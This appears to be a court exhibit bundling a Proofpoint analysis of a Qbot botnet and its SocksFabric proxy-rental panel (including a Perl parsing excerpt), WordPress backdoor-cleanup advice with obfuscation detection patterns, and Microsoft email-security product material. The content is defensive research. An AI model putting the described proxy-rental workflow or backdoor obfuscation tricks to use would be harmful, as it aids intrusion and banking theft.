106       if ($line =~ /nick=\[(.*)\]\s+ip=\[(.*)\]\s+dns_name=\[(.*)\]\s+map=\[(.*)\]\s+country=\[(.*)\]\s+state=\[(.*)\]\s+city=\[(.
                 *)\]\s+zip=\[(.*)\]\s+bw=\[(.*)\]\s+rx=\[(.*)\]\s+tx=\[(.*)\]\s+uptime=\[(.*)\]\s+connected=\[(.*)\]\s+proto_ver=\[(.*)\
                 ]/) {
107          my ($nick, $ip, $dns_name, $map, $country, $state, $city, $zip, $bw, $rx, $tx, $uptime, $connected, $proto_ver) = ($1, $
                 2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14);
108          if (length($nick) > 0) {
109              my $rec;
110              $rec->{"nick"} = $nick;
111              $rec->{"ip"} = $ip;
112              $rec->{"dns_name"} = reverse($dns_name);
113              $rec->{"map"} = $map;
114              $rec->{"country"} = $country;
115              $rec->{"state"} = $state;
116              $rec->{"city"} = $city;
117              $rec->{"zip"} = $zip;
118              $rec->{"bw"} = $bw;
119              $rec->{"rx"} = $rx;
120              $rec->{"tx"} = $tx;
121              $rec->{"uptime"} = $uptime;
122              $rec->{"connected"} = $connected;
123              $rec->{"proto_ver"} = $proto_ver;
124              $rec->{"nattun_server_ip"} = $server_ip;
125              $rec->{"nattun_server_port"} = $server_port;
126              push @socks, $rec;
```
Line 105, Column 9                                              Tab Size: 4          Perl

Screenshot 21. The SocksFabric panel connecting to nattun server for directory data

An attacker renting time on this network – a network running on compromised PC's – would need to first buy credits from this group under the following pricing:



Screenshot 22. The help file includes pricing information

Screenshot 22 is taken from a complete Help manual provided to the user. Once logged into the control panel, the user can see remaining credits and available "socks," or proxy points.

The attacker to whom the network has been rented would then select the desired socks through which to proxy (Screenshot 23). The panel allows for searching based on country, state, city, IP address, DNS name, or bot ID. **It should be noted that this service is not only used as an anonymizing service: socks within targeted organizations serve as easy infiltration points for cyber criminals.** For example, the Search by Bot ID capability provides attackers with a way to lock down certain individuals.

Socks within targeted organizations serve as **easy infiltration points** for cyber criminals.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Screenshot 23. The SocksFabric control panel

Each SocksFabric user is allowed four concurrently open socks. Once the attacker to which the network has been rented decides on the socks through which to tunnel, they can then decide to connect one of their open socks to the selected socks:



Screenshot 23B

At this point, the SocksFabric panel talks to the nattun server where the selected bot is registered. The nattun server requests that the bot spin up a SOCKS5 proxy server, and the bot replies with the proxy server's port number. The control panel displays IP and port data to the user, who then configures her system proxy to tunnel through that bot.

| Аптайм бота | Аптайм соед. | RX | TX | IP:порт подключения |
|---|---|---|---|---|
| 2472 | 2471 | 0 | 0 | |
| 5019 | 5018 | 0 | 0 | |
| 3540 | 3540 | 0 | 0 | |
| 19505 | 19499 | 0 | 0 | ░░.░░.░░.░░:19:5024 |

Screenshot 23C

After a connection has been established, the panel allows for renting attackers to "comment" on the sock, providing a way to annotate each infiltration point:



Screenshot 23D

To facilitate the attackers' infiltration efforts, the panel keeps a searchable history of all of the attackers' connection history.

Microsoft's Windows XP accounts for **52%** of infected clients.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH

Analysis of a cybercrime infrastructure

## Who were the victims?

*Infecting 500,000 systems via compromised WordPress sites and a multi–part attack chain, this cybercrime group used the Qbot banking Trojan to sniff and capture online banking 'conversations' including online account login credentials for many of the largest retail and commercial banks in the US and Europe.*



Screenshot 24. A total of 0.8 million online banking–related HTTPS conversations were sniffed

Screenshot 24 shows that so far, the botnet has successfully sniffed and sent back a total of 0.8 million online banking–related HTTPS conversations. Analyzing infected IP addresses, it can be seen that this group targets primarily US online banking users, with IP addresses in the US representing 75% of infected systems (Figure 8).

Proofpoint's analysis found that Microsoft Internet Explorer accounted for 82% of the successful Qbot infections, which is to be expected given both the size of the Internet Explorer install base and the number and variety of exploits available for this browser. Much more striking is the distribution of operating systems for infected clients (Figure 9). From the cybercrime group's logs, Microsoft's Windows XP accounts for 52% of infected clients, a figure that is at once unsurprising – considering that support for Windows XP, including patches, ended in April 2014 – and at the same time confirms the fears of security leaders who predicted a surge in attacks and infections on an operating system that is still widely used in both consumer and business IT environments. Recent estimates put Windows XP market share at 20–30%, which means that Windows XP clients represent a disproportionate share of the infected clients in this group's Qbot botnet.

The attack chain is designed to establish a foothold on the infected system so that any number of different pieces of malware can be downloaded in order to carry out a wide variety of ciminal activities.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH



Figure 8. Victim geolocation distribution                     Figure 9. Victim OS distribution

# Implications

The operations of this Russian cybercrime group exemplify both the sophisticated attack chain and the key challenges of modern threats. While attackers rely on a variety of means to connect with potential victims, compromised web sites are a critical component in the attack chain. Attackers have the financial and technical means to infect an almost unlimited number of legitimate web sites, above and beyond the more easily identifiable malicious or suspicious sites that traditional defenses are designed to detect and block.

Moreover, the attack chain does not simply deliver a single piece of malware onto an infected system and stop at that. Instead, it is designed to establish a foothold on the system so that any number of different pieces of malicious software can be downloaded in order to carry out criminal activities ranging from banking account theft to secret communications and transfers, to distributed denial of service (DDoS), to ransomware and any other activity that represents an opportunity to monetize that infected system.

## Financial Implications

With 500,000 infected clients stealing online banking account credentials for as many as 800,000 online banking accounts, this cybercrime group has the potential for tremendous profits. Previous takedowns of rings of money transfer "mules" employed by organized crime groups have shown that $25,000 per account is a realistic figure. If even a fraction of a percent of the 800,000 accounts that they have sniffed yields credentials that enable them to conduct illegal electronic funds transfers (EFT) or other transfers this cybercrime group has the potential to net millions of dollars from their operation.

In addition to the potential gains from compromised online banking accounts and EFTs, as this analysis shows the cybercrime group has found other opportunities to monetize their infected systems, for example through the licensing of their SocksFabric service. While there is insufficient data to estimate the usage and therefore the revenues from this service, simple modeling shows that it would be sufficient to at least cover their operational costs, such as fees for login lists, obfuscation services and evasiveness testing.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

## End-user Perspective: Safeguarding PCs and Browsing

For end users, education in safe browsing and email security best practices are important but ultimately one of the best means of protecting themselves is to regularly apply patches and disable risky services. Ensuring that your most-frequently targeted applications are patched can reduce the risk that visiting a compromised web site or clicking on a malicious link or attachment in an email will have catastrophic consequences. This generally means applying all Critical security updates for your operating system and browser, but also making sure that users have applied the latest patches for Java (from Oracle) and Adobe Flash and Reader. Proofpoint sees many attacks with PDFs that exploit three- and four-year old vulnerabilities in Adobe Reader and Microsoft Internet Explorer, and of course Windows XP users must absolutely take steps to switch to a supported operating systems.

Proofpoint analysts see web-based exploits every day that use malicious JavaScript hidden in a compromised web site. Another simple measure users can take to protect themselves is to disable JavaScript in their browsers: if it is not practical to disable JavaScript for all sites, then consider doing so for untrusted zones or sites.

Finally, Microsoft Windows users should consider downloading and using the Enhanced Mitigation Experience Toolkit (EMET) 5.0 for an added measure of protection.

## Institutional Perspective: Safeguarding Banks

Banks should offer – and encourage their customers to use – two-factor authentication options for their online banking activities. While this will not protect the end-users' systems from infection by compromised sites, it will make it more difficult for cybercrime groups to make use of the credentials that they successfully sniff from users' online banking sessions.

For organizations seeking to protect their users from email-borne threats – from phishing to legitimate emails linking to malvertising or other compromised sites – a layered defense is essential. Best practices have expanded so that simply detecting and blocking known malware and known malicious URLs are no longer sufficient: a combination of effective anti-spam, antivirus, and URL reputation (for known threats) with advanced threat detection capabilities (such as malware and URL sandboxing and big-data analytics to provide predictive protection) is now the standard.

A critical complement to this is the ability to identify high-risk incidents when they occur and rapidly trace them back to effected systems and users in order to mitigate risk to the rest of the environment and user base. Finally, organizations have to look to cloud-based solutions: more than most organizations they are faced with a diverse and dispersed base of users and endpoints and traditional gateway solutions are not going to be able to provide protection that follows their users across their different devices.

## Website Perspective:  A Note on WordPress

See the Appendix for a guide to identifying whether your WordPress site is vulnerable and compromised, as well as steps to clean up infected systems.

**Credits:** Wayne Huang, Sun Huang, Alex Ruan, G. Mladenov, Jordan Forssman, Martin Chen, Lance Chang, Allan Ku, Jeff Lee, Aryan Chen, Tom Kao, Brian Burns, Chris Iezzoni

### Proofpoint Targeted Attack Protection

• Advanced Protection: Protect against targeted email threats such as spear-phishing attacks, zero-day exploits, advanced persistent threats (APTs)

• Proactive Protection:  Analyze attachments and URL links before users click them to reduce the risk of infection

• Big Data Analytics: Automated analysis of millions of messages and URLs identifies threats that can evade traditional defenses

• Cloud Architecture: Billions of messages traverse the Proofpoint cloud every week, providing global visibility and early protection for emerging threats

Learn about modern advanced threats as they are caught in action and analyzed by Proofpoint by visiting the Threat Insight blog at: https://www.proofpoint.com/threatinsight/posts/

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

# APPENDIX

## Suggestions on Cleaning Up and Securing Wordpress

### 1.   How do WordPress Sites get infected?

WordPress (WP) is [the most widely used CMS tool](#), making it a prime target for attackers wanting to distribute malware.  While the WordPress team is generally quick to address discovered vulnerabilities and release patches, adoption of these patches is unfortunately rather slow, leaving many out–of–date versions lingering on the Web for considerable periods of time. This extended window of vulnerability provide attackers ample time to take advantage of known vulnerabilities and compromise huge numbers of sites running vulnerable WP installations.

In addition to outdated WP installations, vulnerable or outdated WP Plugins, adoption of weak passwords (WP Admin, FTP, etc) and sometimes even insecure Webhosts can be the root cause behind a compromised WP site.

### 2.   Detecting an Infection

There exist a number of strategies that can be adopted to determine if a specific WP installation has been compromised. These include the use of WordPress scanners to try to detect malicious code present on the site's publicly facing pages, running WP Core Integrity checks to determine if the Core WP installation files (which should not change) have been modified at all, checking with Google's Safe–Browsing API to determine if the site suffers from a known infection, running a Google "site:www.example.com" search and studying results to identify if any unusual, strange or malformed file names are present on the site, as well as looking through key files and folders that are commonly modified to include attacker code.

Neither of these solutions provides a 100% guarantee that they will detect a breach. Modern Web–based malware is unfortunately so dynamic that it is recommended to leverage as many of these options as possible.

    a.   Scanners

Scanners operate from the outside and analyze a site's pages to determine whether or not specific patterns of malicious code or specific exploits can be found on the scanned page.

There exist a number of free and paid online scanners and we have listed a few that have been known to work well with WordPress, here:

       i.    [Sucuri](#)

       ii.   [Quterra](#)

       iii.  [i09 Wordpress Exploit Scanner](#)

       iv.   [Others](#)

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

b.   WP Core Integrity Check

The core WP files should not change when updating plugins and themes, and sometimes even survive version updates. For this reason, attackers often choose to place backdoor code (covered in Section 8) in these files and folders as it grants them a degree of persistency they could not otherwise achieve. However, this presents a robust check–point that allows WP admins to identify whether or not something untoward has occurred on the system.

Checking the WP core's integrity to determine whether or not the core file structure matches that of the core system available for that version indicates whether or not changes have been made, and if there are changes, the WP installation is likely compromised.

Two tools that help check the WP core are provided below:

  i.   Sucuri (How to)
  ii.   Wordfence

c.   Using Google
  i.   site:search (LOOK for: unusual/random filenames)
  ii.   Blacklisted? Google Safe–Browsing Diagnostics

Leveraging Google can provide some useful insight into the state of any particular WP installation. Running the search "site: yoursitehere.com" in Google lists out all files Google can discern on the target site, allowing us to identify whether any strange, random or unusual filenames are present on the site.  These may be indicative of a compromised site.

Another resource Google provides is its Safe Browsing Diagnostic, which will describe any malicious code Google may have identified on the site in question within the past 90 days. Simply replace [yoursitehere.com] with your domain's homepage and run in any browser:

http://www.google.com/safebrowsing/diagnostic?site=[yoursitehere.com]

d.   Search Files, Folders and Database for Malicious Code

A fourth option is to comb through the WP site's files, folders and database to determine whether any malicious code or files may be present.  Be sure to unhide any hidden files or folders so they aren't overlooked in this process. This option is more time–consuming, but can provide insight that the other options may have missed.

  i.   LOOK IN:
    • .htaccess, index.php, wp-content/themes/index.php; /header.php; /footer. php; /functions.php, Database
  ii.   LOOK FOR:
    • Files: .exe, .swf, .jar, .dll, sometimes malicious redirects masquerade as image files
    • Code/Script: < iframe>, "display:none", (obfuscated)  JavaScript

If any suspicious looking code that generates iframes or redirects is found, REMOVE it. If any suspicious files are found, DELETE them.

Analysis of a Cybercrime Infrastructure

## 3.    Scan Local System

Should any of the above methods provide a positive indication of the WP site having been compromised, or even raise suspicion of a possible compromise, use multiple Anti–Virus solutions to scan your local system to try to identify whether or not the attack is the result of a compromised machine.

A local compromise can sometimes be the beachhead attackers used to gain access to the WP installation. If this is the case, any kind of malware may be present on the machine, including backdoors, keyloggers, screen or memory scrapers, etc, which may be used to monitor any changes you attempt to make from this point on. Thus, it is good practice to ensure your local machine is clean.

## 4.    Backup WordPress

Backup all WordPress files.

If a very recent (non–compromised) backup is available, at this point it may be sufficient to reinstall the WP site from the backup and upgrading the WP version and all Plugins and Themes to the very latest versions.

## 5.    Take Down the WP Site

If there is a strong indication that the site is infected, it may be advisable to take the site down temporarily in order to prevent users from accessing the site and becoming infected as well.

## 6.    Update the WP Site

Update the WP installation to the latest version, including all plugins and themes. This is important to try and eliminate any vulnerability that may have been used to breach the site's security.  Another option would be to re-install the WP core from a clean .zip file and then run the update tool. Ensure you have the site backed–up before you do this.

## 7.    Update Access Controls

If the site has been compromised, or if there is any suspicion it has been compromised, it is very important that ALL access controls be updated.

   a.    Change ALL Passwords
      i.    Wordpress, especially admin and editor passwords, but even changing ordinary users' passwords is a good idea.
      ii.    CPanel or any other control panel provided by the Webhost
      iii.    FTP
      iv.    SSH
      v.    Pretty much everything and anything that requires a password

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

It is highly recommended that long, hard to guess passwords be selected.  Using randomly generated passwords that include both alphanumeric and special characters is a good idea. There are a number of free tools available online, such as Passpack and KeePass, that help generate and manage passwords.

    b.   Check Users:

Check up on all users of the site. For Admins/Editors: DELETE unrecognized accounts. Attackers often create new accounts in order maintain persistence. Hence, anyone that does not require admin or editor permissions should either be deleted or, at the very least, have downgraded permissions.

    c.   Secret Key:

Even after all passwords have been changed, the attacker may still be connected to the system through valid cookies. Therefore, all sessions must be cancelled.

This can be achieved by changing the WP security keys  to ensure any active sessions initiated by the attacker will be ended and they will be logged out of the site.

## 8.   Find and Remove Backdoors

At this point, any malicious code and/or files should have been removed; the WP infrastructure (including core, plugins and themes) should have been updated, and ALL access controls, such as passwords should have been updated.

Unfortunately this is not enough to ensure the site is safe. One of the first things attackers do on gaining access is to install backdoors into the system.

Backdoors may include added users accounts, Webshells, or other mechanisms that allow remote access to and control over the site, often simply through a browser. For this reason, they are often installed in locations that survive most updates.

    a.   What to Look for:

Backdoors can be in the form of files uploaded to the system, or tiny scripts included in pre–existing files. Hence, this step can be quite time–consuming and requires a degree of thoroughness in order to ensure that nothing is overlooked.

        i.   Files: These are usually designed to look innocuous or as if they belong where they are, though sometimes they can simply be random filenames. Often, though, these will contain popular plugin or widget filenames such as 'akismet' or others to make the files appear legit. Knowing the legitimate filenames for your plugins, themes, and so on, as well as checking the file extensions will help root out the good from the bad.

       ii.   Scripts: Scripts injected into legitimate files will usually try to hide their true nature by encoding. One of the most common ways to achieve this is by using "eval()" and "base64_decode()" functions. Note that sometimes these can be reversed and may appear as "()lave" or "()edoced_46esab", or may be partially split up, etc.  Other things to look for include variables like $a = 'm'.'d5', $y = 'base'.'6'.'4', etc, and of course, random/obfuscated strings.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH

Analysis on Cybercrime Infrastructure

b. Where to Look:
- i. Filesystem
  - Themes (wp–themes/) – It is a good idea to just DELETE inactive themes
  - Plugins (wp-content/plugins/)
  - Content (wp-content/)
  - wp–config.php
  - Uploads Folder
  - Includes Folder (wp–includes/, wp–includes/images, etc)
  - Other (.htaccess/posts/pages/widgets)
- ii. Database
  - Backdoor code can often be obfuscated in both files and databases by placing it in the middle of a large chunk of 'junk' code that is /*commented out */, so searching through this with a text editor that highlights syntax makes the job easier.
- iii. If Root Access is Available
  - Apache
  - Nginx

## 9. Update Access Controls

Once you have identified and removed any backdoors, it is advisable to change ALL passwords a second time.

## 10. Verify

At this point the WP installation should be free of malicious code and interference from malicious parties. It is recommended to take the following steps:

a. Run the update tool again

b. Remove any cached files

c. Run step 2 of this post again, or at least any of the methods that delivered a positive indication of malicious/suspicious code

d. If problems persist and the site is on a shared hosting plan, there is a good chance the server has been compromised at a lower level. In this case it is best to contact the Web Hosting provider and communicate the issue. Depending on their responsiveness, it may be advisable to consider switching Web Hosts.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

## 11. Harden the WP Site

If the site was taken down to protect visitors, before putting the site up again, it would be a good idea to harden the site against potential future attacks. The list below provides some actions that can be followed to improve the site's overall security posture:

a.   Never use the default 'admin' username

b.   Leverage a secure password policy (as mentioned in this post)

c.   Make use of SFTP when managing your site

d.   Install an Intrusion Detection System (IDS), such as Tripwire or OSSEC

e.   Install a Web Application Firewall (WAF)

f.   Harden the wp-config.php file by following this tutorial

g.   Leverage a Scanner to frequently check your WP site's security posture

h.   Leverage some of the security Plugins mentioned in this post

i.   Limit themes to popular, well-known themes that are updated regularly (stay away from pirated themes)

j.   Always keep WP and its themes and plugins updated to the latest version. Tools are available to assist with this:

   i.   Automated WP Plugins Update Plugin by Whitefir

k.   Always maintain regular backups of the site



Proofpoint, Inc.
892 Ross Drive, Sunnyvale, CA 94089
Tel: +1 408 517 4710
www.proofpoint.com

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14   THREAT RESEARCH

# APPENDIX 5



Exchange Online
Advanced Threat Protection
Product Guide

Microsoft

# Contents

Exchange Online Advanced Threat Protection Introduction ................................................................................2

Solution Overview ................................................................................3

Service Architecture ................................................................................4

Safe Attachments ................................................................................5

Safe Links ................................................................................6

Reporting and Tracing ................................................................................7

How to buy Exchange Online Advanced Threat Protection ................................................................................8

# Exchange Online Advanced ThreatProtection

Office 365 provides robust email protection against spam, viruses, and malware with Exchange Online Protection (EOP). But, as hackers around the globe launch increasingly sophisticated attacks, organizations are seeking tools that provide additional protection. We are pleased to offer customers new security capabilities in Office 365 with Exchange Online Advanced Threat Protection (ATP), an email filtering service that provides additional protection against specific types of advanced threats.

# Solution Overview

Microsoft Exchange Online Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection, and includes features to help safeguard your organization from harmful links in real-time. ATP has rich reporting and URL trace capabilities that give admins insight into the kind of attacks happening in your organization.

Advanced Threat Protection for Exchange Online delivers the following benefits:

• Protection against unknown malware and viruses—Today EOP employs a robust and layered anti-virus protection powered with three different engines against known malware and viruses. ATP extends this protection through a feature called Safe Attachments, which helps protect against unknown malware and viruses, and provides better zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special hypervisor environment, where a behavior analysis is performed using a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

• Real-time, time-of-click protection against malicious URLs—EOP scans each message in transit in Office 365 and provides time of delivery protection, blocking malicious hyperlinks in a message. But, attackers sometimes try to hide malicious URLs with seemingly safe links that are redirected to unsafe sites by a forwarding service after the message has been received. ATP's Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.

• Rich reporting and URL trace capabilities—ATP also offers rich reporting and tracking capabilities, so you can gain critical insights into who is getting targeted in your organization and the category of attacks you are facing. Reporting and message tracing allows you to investigate messages that have been blocked due to an unknown virus or malware, while the URL trace capability allows you to track individual malicious links in the messages that have been clicked.

# Service Architecture



Exchange Online Advanced Threat Protection Capabilities:

- Safe Links
  ATP's Safe Links feature proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.

- Safe Attachments
  Safe Attachments helps protect against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

## Safe attachments

What is Safe Attachments?

Safe Attachments is a new feature that opens suspected unknown attachment in a special hypervisor environment and detects malicious activity. It is designed to detect malicious attachments even before anti-virus signatures are available. Safe attachments will detonate attachments that are common targets for malicious content, such as Office documents, PDFs, executable file types, and Flash files.



Admin sets policy

Admin gets notification if message is blocked

Set up a safe attachments policy

1. In the Exchange Admin Center (EAC), go to Advanced threats > Safe attachments. (Name your policy)

2. Select the action for unknown malware in attachments: Monitor, Block or Replace

3. Configure the Redirect attachment on detection and enter in an email address to receive the ATP notification. *It is recommended creating a new mailbox to receive ATP notifications since they will contain the attachment detected as unknown malware.

4. If you want to enable an attachments policy that can be applied to users, groups, and domains in your organization, go to the Applied to section of the ATP policy, and then choose The recipient is, The recipient domain is or the recipient if a member of.

5. Save your policy

## Safe Links

What is Safe Links?

Safe Links is a feature that prevents users from going to malicious web sites when they click on them in email. Safe Links has advanced reporting features that make it easy to determine who has clicked through a malicious link to support faster remediation.



Admin sets policy



Users notified if a malicious link is clicked in email

### Setup a Safe Links Policy

1. In the Exchange Admin Center (EAC), go to Advanced threats > Safe links.

2. Go to Settings, and then choose On so that URLs will be rewritten and checked.

3. Optional: Uncheck Do not track user clicks if you don't want to store information about which user followed a particular link. Do check the box if you want to store this information.

4. Optional: Uncheck Do not allow users to click through to the original URL if you want your users to have the option of following a link even if ATP has determined that the link points to a malicious website. Do check the box in order to stop users from proceeding to the URL target of a link.

5. 5.Choose Save.

Reporting and Tracing

Message Trace

Find out if a specific email has been detonated, and get the results - You can keep track of each message and attachment that is routed to safe attachments after a policy is applied. To find out the status of such messages, go to the Exchange Admin Center and choose mail flow > message trace. The message trace details have information for each message and attachment.

URL Trace

Find out who has been following malicious links - Your safe links policy can be enabled to log which recipients are following links that have been protected by safe links. If tracking URLs is also enabled, this information can be found in the Exchange Admin Center by choosing mail flow > URL trace. You can sort the URL trace report by date range, recipients, and specific URLs.



Admins have complete visibility into who clicked on what links

Reporting by file types and disposition

ATP Disposition Reports

The disposition reports can be used to see the number of messages and file types

1. To access the disposition reports, in the Exchange Admin Center (EAC), go to Advanced threats > Click the reports icon drop down arrow to select either the Advanced Threat Protection Disposition Report by file type or disposition.

# How to buy Exchange Online Advanced Threat Protection

Protect your email in real time against unknown and sophisticated attacks.

Advanced Threat Protection is included in the new, most comprehensive enterprise plan – Office 365 Enterprise E5.

You can also add Advanced Threat Protection to the following Exchange and Office 365 subscription plans for $2.00 per user: Exchange Online Plan 1, Exchange Online Plan 2, Exchange Online Kiosk, Exchange Online Protection, Office 365 Business Essentials, Office 365 Business Premium, Office 365 Enterprise E1, Office 365 Enterprise E2, Office 365 Enterprise E3, Office 365 Enterprise E4, Office 365 Enterprise K1, Office 365 Enterprise K2.

To add Advanced Threat Protection to your subscription, contact your volume licensing reseller or visit office.com/enterprise-solutions to learn more.

© 2015 Microsoft. All rights reserved. This document is provided "as-is." Information and views expressed in this document, including URL and other Internet Web site references, may change without notice. Some information may relate to pre-released product and may be substantially modified before being commercially released or changed overtime with product updates. You bear the risk of using it.

# APPENDIX 6

Case 1:20-cv-60416-AMC   Document 69-2   Entered on FLSD Docket 05/26/2021   Page 87 of 143

Microsoft

# Microsoft thwarts phishing attacks with Office 365

Microsoft processes more than 450 billion emails a month and blocks 10 million spam messages a minute to help protect people from malicious email, spam, and malware. Together, Microsoft Office 365, Exchange Online Protection (EOP) and Office 365 Advanced Threat Protection (Office 365 ATP) help defend against cyberthreats and guard data and intellectual property in real time—while enabling your organization to remain productive. EOP and Office 365 ATP are part of the broader, holistic Microsoft security platform, which includes security capabilities in Office 365 and in Microsoft technologies like Windows Defender ATP, Windows 10 (Device Guard and Credential Guard), Intune, and Azure Security Center.

These services all help protect against cyberthreats and use powerful machine learning algorithms partly built from signals that we get from emails and attachments. We also study patterns and anomalies that help detect malicious email, spam, and malware.

## What is phishing?

One common form of unwanted email that EOP and Office 365 ATP help address is *phishing* email—a type of online identity theft. *Threat actors*—or attackers—try to trick you into opening a link or attachment, replying to an email, wiring money, or taking other action. They may also try to coax you into giving corporate or personal information like account details, passwords, or credit card numbers. Attackers try to lure you with seemingly legitimate email, text messages, websites, or phone calls, and use the information for financial gain, espionage, or other nefarious purposes. Attackers often use fake websites, issue threats, pose as a legitimate company, or pretend to be someone you know.

Let's take a closer look at some typical phishing attacks. Considering these common tactics, we'll show:

- How EOP and Office 365 ATP help improve protection against large volumes of complex phishing attacks.
- How our Core Services and Engineering organization (formerly Microsoft IT) at Microsoft—which handles more than 15 billion security events per day—uses EOP and Office 365 ATP to learn about attacks, investigate and respond to attacks faster, and be more proactive.

## Phishing attempts are increasingly sophisticated

Phishing attempts are constant, and attackers' tactics are constantly evolving. Organizations must get ahead of these attempts—armed with awareness and technologies that constantly evolve to help protect against malware and viruses. This is especially true given ever more sophisticated attacks. For example:

- In the past, phishing emails—sent at mass volume—weren't as carefully constructed or as targeted. Today, there's a vast industry dedicated to phishing cyberattacks. Perpetrators include professional criminals, organized crime, and nation-states. There are companies that employ criminals, with their own research and surveillance teams. Threat actors pay close attention to spoofing a company or person and making a message look legit.
- Because of the proprietary information that they have, executives are a common high-profile target in phishing attacks known as *whaling*.
- *Spear-phishing* poses a special challenge. Whereas phishing casts a wide net, spear-phishing targets specific people. Emails appear to come from a company you do business with or someone you know and trust, like your boss or colleagues. Spear-phishers seem familiar with how your organization operates or what your interests are.
- From an overall industry standpoint, 91 percent of security breaches begin as phishing or spear-phishing. Verizon's 2017 Data Breach Investigations Report states that 1 in 14 people clicked a link or opened an attachment in a phishing message; 25 percent of these people fell victim more than once.

- Rather than setting up special domains for a campaign—only to have security mechanisms identify them as fake and block the content—a growing trend is for some attackers to compromise trusted websites and insert a page with phishing content.
- Today's life cycle of phishing attacks is shorter, which makes it harder for antiphishing technologies to keep pace.

## Common types of phishing

Although there are many types of phishing, common ones include:

- **Stealing credentials.** To get inside information, an attacker obtains a person's user name and password—for example, credentials that an employee uses to access company resources.
- **Identity theft.** With the credentials and information, an attacker impersonates a user or company.
- **Stealing personal information.** An attacker goes after personal account details, passwords, credit card numbers, or other sensitive information.

Here's an example of a phishing scenario:

1. An attacker targets a broad set of people (or a subset, in the case of spear-phishing) by sending email from what seems to be a legitimate online service, retailer, or financial institution.

2. The email has a link that directs people to a malicious website or webpage, or it has an attachment.

3. If the email recipient clicks the link or opens the attachment, malware is downloaded to their computer, and the attacker gains access to their network. Other malware can be used to steal information (cyberespionage) or encrypt files for ransom (ransomware). The malware often steals credentials used for multiple apps and the attacker can use the credentials for further attacks, such as signing in to banking or retail websites.

# EOP and Office 365 ATP help address volume and sophistication

Although phishing tricks and tactics never cease, awareness and antiphishing technologies go a long way in thwarting them. No one solution can stop all phishing campaigns. However, EOP and Office 365 ATP—part of the Microsoft Office 365 threat protection stack—help organizations defend against the volume and sophisticated nature of today's email-based phishing attacks:

- **EOP for known threats.** EOP is an email filtering service that helps protect against the volume of attacks by filtering *known* spam, viruses, and malware.
- **Office 365 ATP for unknown threats.** Like EOP, Office 365 ATP is an email filtering service, and the two are closely integrated. Office 365 ATP helps protect against *unknown* threats—including help stopping sophisticated, zero-day advanced threats.

EOP and Office 365 ATP—along with security capabilities in products and services like Windows 10, Windows Defender ATP, Threat explorer in Office 365 Threat Intelligence, which helps you detect and analyze threats, and Azure Security Center—are key parts of our robust antiphishing strategy.

## How EOP helps protect against phishing

Integrated with Office 365 ATP, EOP is available for all Office 365 mailboxes. EOP capabilities include:

- **Protection that keeps evolving.** EOP helps protect against known viruses, spam, phishing, malware, and spoofing. Antimalware scan engines detect and block early-stage threats before they infiltrate network devices.
- **Inbound and outbound email filtering.** EOP captures more than 99 percent of spam emails and viruses. To block spam, it uses filtering, IP address block/allow lists, malicious URL block lists, and machine learning.

- **Zero-hour auto purge.** From constant monitoring and updates to Office 365 antispam and antimalware signatures, zero-hour auto purge detects delivered messages with spam or malware. If the messages are unread and flagged as malicious, it moves them to the Junk mail folder.
- **Safety tips in Microsoft Outlook.** Suspicious and phishing emails are flagged with tips stating that the email is from an untrusted source, and a red bar appears at the top of the email.
- **Filtering for common malicious attachment types.** Email administrators can filter out unwanted and suspicious attachments by file type within the Malware Policy.
- **Phishing reporting.** Users can report phishing through the **Report Message** feature in Outlook and Outlook.com.
- **Protection against insider spoofing, which has led to 500-percent stronger counterfeit detection.** Suppose a phisher impersonates an executive from the same company as an email recipient, by spoofing the email domain. EOP antispoofing capabilities use reputation filters to block email from low-reputation IP addresses, domains, and senders, and vigorously check authentication.

## How Office 365 ATP helps protect against phishing

Office 365 ATP is available as part of Office 365 Enterprise E5 and as a standalone component. It addresses evolving threats like phishing attacks, at scale, with:

- **Safe attachments.** This helps to protect against unknown malware and viruses with behavior analysis, and machine learning algorithms.
- **Safe links.** This helps to protect against malicious URLs at time-of-click.
- **URL detonation.** This helps to protect users against files that are linked to in the body of an emails, combining the capabilities of Safe attachments and Safe links.
- **Reporting and tracing.** This provides URL trace and reports on advanced threats.
- **Office 365 ATP enhanced reporting.** This shows malware and spam trends in an organization.

